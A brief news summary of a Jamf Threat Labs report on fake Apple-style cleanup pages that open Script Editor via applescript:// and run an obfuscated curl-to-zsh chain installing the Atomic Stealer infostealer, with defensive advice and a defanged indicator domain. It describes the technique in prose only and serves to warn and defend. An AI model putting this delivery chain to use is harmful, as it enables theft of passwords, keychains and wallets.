Overview
- Jamf Threat Labs, which detailed the tactic Wednesday, reports fake Apple‑style cleanup pages now launch Script Editor from the browser to avoid the new Terminal paste warning.
- Clicking an on‑page “Execute” button invokes the applescript:// URL scheme, opens Script Editor with a pre‑filled script, and nudges the user to run it as a routine task.
- The script runs an obfuscated curl piped to zsh that decodes a payload, downloads a Mach‑O to /tmp, clears extended attributes with xattr -c, makes it executable, and starts it.
- Jamf identified the final binary as Atomic Stealer, an infostealer that targets Keychain items, browser wallets and autofill data, passwords, cookies, saved cards, and can add a backdoor for persistence.
- Security guidance urges users to treat browser requests to open Script Editor as high risk, rely on official Apple help, and block indicators shared by researchers such as dryvecar[.]com.